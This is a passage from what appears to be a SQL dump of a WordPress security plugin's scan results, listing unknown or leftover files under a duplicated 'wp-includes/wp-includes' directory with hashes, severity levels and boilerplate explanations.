More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/images/uploader-icons.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27022,1631424892,1631424892,'new','knownfile',75,'e2939a45010cdf0ee5d6895d39bce6fe','dc21a788521f7334d3baa9ed19719c0a','Unknown file in WordPress core: wp-includes/wp-includes/images/w-logo-blue-white-bg.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/w-logo-blue-white-bg.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27023,1631424892,1631424892,'new','knownfile',75,'57562017543f28d9fe7a5f9c91a975be','6f1b27c4a69a528d8e722085f2c80b10','Unknown file in WordPress core: wp-includes/wp-includes/images/w-logo-blue.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/images/w-logo-blue.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27024,1631424892,1631424892,'new','knownfile',75,'d1a06ddde0430e47e5a065ffe222d1a6','854d8408883dfef0930cf1cb44111aa1','Unknown file in WordPress core: wp-includes/wp-includes/images/wlw/wp-comments.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/images/wlw/wp-comments.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27025,1631424892,1631424892,'new','knownfile',75,'d985ea1ffbd44ddfb8301a38a4efdf3e','c2436e8f29be1645f006906c088f7349','Unknown file in WordPress core: wp-includes/wp-includes/images/wlw/wp-icon.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/images/wlw/wp-icon.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27026,1631424893,1631424893,'new','knownfile',75,'36173eed9e610be0ca49867c599147d5','227fb7297bb58af89d6d8194746bb2a2','Unknown file in WordPress core: wp-includes/wp-includes/images/wlw/wp-watermark.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/wlw/wp-watermark.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27027,1631424893,1631424893,'new','knownfile',75,'3626aa1fa66ec68aa5e3ea03d55bfd9a','41613803e281526724dd916dae369872','Unknown file in WordPress core: wp-includes/wp-includes/images/wpicons-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/images/wpicons-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27028,1631424893,1631424893,'new','knownfile',75,'8de2d0ac522dd95cc20571d8f1dccb4f','30b6cdcfb5225464a42d8ea474a8ae68','Unknown file in WordPress core: wp-includes/wp-includes/images/wpicons.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/images/wpicons.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27029,1631424893,1631424893,'new','knownfile',75,'f5d75340ccc590aa659aea76cb8ca990','6a8ff729d6d046043a7659d8bba9413d','Unknown file in WordPress core: wp-includes/wp-includes/images/wpspin-2x.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/images/wpspin-2x.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27030,1631424893,1631424893,'new','knownfile',75,'135cbd8861f29b040526bea83c73ff0b','d56caf17c006488fbcf3f40eac14b45a','Unknown file in WordPress core: wp-includes/wp-includes/images/wpspin.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/images/wpspin.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27031,1631424893,1631424893,'new','knownfile',75,'fd6c2f90419570d1af14769360443b30','79f54a0b5f14c8e1c79060ccc3436f69','Unknown file in WordPress core: wp-includes/wp-includes/images/xit-2x.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/images/xit-2x.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27032,1631424893,1631424893,'new','knownfile',75,'679c42ac75bcfdcf20733bfd42a3040f','2a9e4fa38c46b9e61a597fcb045edbdc','Unknown file in WordPress core: wp-includes/wp-includes/images/xit.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/images/xit.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27033,1631424893,1631424893,'new','knownfile',75,'6b56594499821f65e75be6697e581a85','965dc13f074b4599c0baec43ae9020c9','Unknown file in WordPress core: wp-includes/wp-includes/js/admin-bar.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/admin-bar.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27034,1631424893,1631424893,'new','knownfile',75,'4f70be370df42a86179beba0d8dbe1a8','e9f5151d37a6b047a2d8dc9cec33e353','Unknown file in WordPress core: wp-includes/wp-includes/js/admin-bar.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/admin-bar.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27035,1631424893,1631424893,'new','knownfile',75,'d23c65686d03fb213ff275e89d0c3824','7b91d19e194f804f25ac7bdfd339870a','Unknown file in WordPress core: wp-includes/wp-includes/js/api-request.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/api-request.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27036,1631424894,1631424894,'new','knownfile',75,'a51c9c379020c8d85fefb948874c3c30','d2166ed0781bea58baae551ce6516c80','Unknown file in WordPress core: wp-includes/wp-includes/js/api-request.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/api-request.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27037,1631424894,1631424894,'new','knownfile',75,'75bdef5d896e834477d4c0fc5e4b2e5c','57e1a811404dd974583eaa8ff3e1646b','Unknown file in WordPress core: wp-includes/wp-includes/js/autosave.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/autosave.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27038,1631424895,1631424895,'new','knownfile',75,'2cb77339c53a6fc33535c629478cd914','bf66969082ab3cbf800683f593b6849b','Unknown file in WordPress core: wp-includes/wp-includes/js/autosave.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/autosave.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27039,1631424895,1631424895,'new','knownfile',75,'905365db676c3bc5625a5ef617f281d1','6aa4569939be1d4114007219951f9e93','Unknown file in WordPress core: wp-includes/wp-includes/js/backbone.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/backbone.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27040,1631424895,1631424895,'new','knownfile',75,'06ae6de61d4ac8e62363208119b35faa','9d6bfbc2a517c52db0d2972f7893e15d','Unknown file in WordPress core: wp-includes/wp-includes/js/backbone.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/backbone.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27041,1631424895,1631424895,'new','knownfile',75,'d19d2f50439fdbab84e86a31153a8060','14f9d4c7e2c6ea93f0807f2a2adb2810','Unknown file in WordPress core: wp-includes/wp-includes/js/clipboard.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/clipboard.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27042,1631424895,1631424895,'new','knownfile',75,'e045caadbc687adb9efd8ea2b8880871','2b977d4395fcaa9e81566a563f419448','Unknown file in WordPress core: wp-includes/wp-includes/js/clipboard.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/clipboard.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27043,1631424895,1631424895,'new','knownfile',75,'2dadfa6e46e6c7a6a03f12987e6f6524','c7d3582c89c9e4bb668b987e5752cdb4','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/codemirror.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/codemirror/codemirror.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27044,1631424895,1631424895,'new','knownfile',75,'845389c262b5085f9ffa9ec1d86cca2b','478d3b2497125f7ccd350908f4b48ea1','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/codemirror.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/codemirror/codemirror.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27045,1631424895,1631424895,'new','knownfile',75,'3974ce0decf98bf0744f37e6bae75f38','10da66140fcd5f63875a4b588e66de0c','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/csslint.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/codemirror/csslint.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27046,1631424895,1631424895,'new','knownfile',75,'9e7c1c00d41a3abd44f3631467663b7f','33b92a2ac253f119962e8308a7bc645a','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/esprima.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/codemirror/esprima.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27047,1631424895,1631424895,'new','knownfile',75,'31e2da3a77d3923b273e5885fa339404','4df016b7399fe169dd220333becde7ec','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/fakejshint.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/codemirror/fakejshint.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27048,1631424895,1631424895,'new','knownfile',75,'7400e4d70d13d516051f895bc501f9c5','4d29f33677622451f372d567e3ad5b84','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/htmlhint-kses.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/codemirror/htmlhint-kses.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27049,1631424895,1631424895,'new','knownfile',75,'d6492a7ed334f822b6b5dbab9a27f8a7','bcaaaa5ba796379b38ee22cc7a1b5298','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/htmlhint.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/codemirror/htmlhint.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27050,1631424895,1631424895,'new','knownfile',75,'a375b70adfc548deb21deb053893ed9c','8d3d3d4d673405fb8f8c4cc7db22edc0','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/jsonlint.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/codemirror/jsonlint.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27051,1631424896,1631424896,'new','knownfile',25,'b643e08a202adb65a058deb2585280bd','46bed733584dcf8c23f3504c73332b1c','Old WordPress core file not removed during update: wp-includes/wp-includes/js/colorpicker.js','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/colorpicker.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27052,1631424896,1631424896,'new','knownfile',75,'850aceb1c3a66ac4d93b03907e63b3b2','b6f8a17d244504fa7886626aed910a6f','Unknown file in WordPress core: wp-includes/wp-includes/js/colorpicker.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/colorpicker.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27053,1631424896,1631424896,'new','knownfile',75,'3c31752954063debe37ad766d2914e0c','cfa9cbd5e77921b2cce64c83fddb7691','Unknown file in WordPress core: wp-includes/wp-includes/js/comment-reply.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/comment-reply.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27054,1631424896,1631424896,'new','knownfile',75,'ed313d3dcdc8d9b453d408b4e5428b5e','9d7e69ef1fbc399a367d5023a67a15d1','Unknown file in WordPress core: wp-includes/wp-includes/js/comment-reply.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/comment-reply.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27055,1631424896,1631424896,'new','knownfile',75,'5e55a70dc8fc79a952874ca36bd53f57','82b0f9458e75540a40e2c002165c0efc','Unknown file in WordPress core: wp-includes/wp-includes/js/crop/cropper.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/crop/cropper.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27056,1631424896,1631424896,'new','knownfile',75,'4f42be6f6f02c623639ffcb8797867cd','7426a22ed62233ae94d21a1c2738710e','Unknown file in WordPress core: wp-includes/wp-includes/js/crop/cropper.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/crop/cropper.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27057,1631424896,1631424896,'new','knownfile',75,'ded7369d4f618f86e85a9b4d85b8c4b2','93abedb124a7dff770c1f1ff5ac05142','Unknown file in WordPress core: wp-includes/wp-includes/js/crop/marqueeHoriz.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/crop/marqueeHoriz.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27058,1631424896,1631424896,'new','knownfile',75,'6d70420461870b8dda525eadc6b739bf','829c0eb67175f9949b812e68e9b74256','Unknown file in WordPress core: wp-includes/wp-includes/js/crop/marqueeVert.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/crop/marqueeVert.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27059,1631424897,1631424897,'new','knownfile',75,'dfb79e4cbaec94ad5b055a456f10e8b2','d587befecfe9226f1ba72454f8238fcd','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-base.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/customize-base.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27060,1631424897,1631424897,'new','knownfile',75,'8a8fae3620ad2a827634e40a42ce3814','099b5e7956e76dfbdaa044304d6e2153','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-base.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/customize-base.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27061,1631424897,1631424897,'new','knownfile',75,'1d4e54642c39e11ee78371644d02d8d7','a6fb1a84c1b1eb87e8e4c97e194ed6fe','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-loader.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/customize-loader.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27062,1631424897,1631424897,'new','knownfile',75,'d27c7b21a696ddf8592c69e371540832','5d4cab20dc07c2d50586be30762af050','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-loader.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another 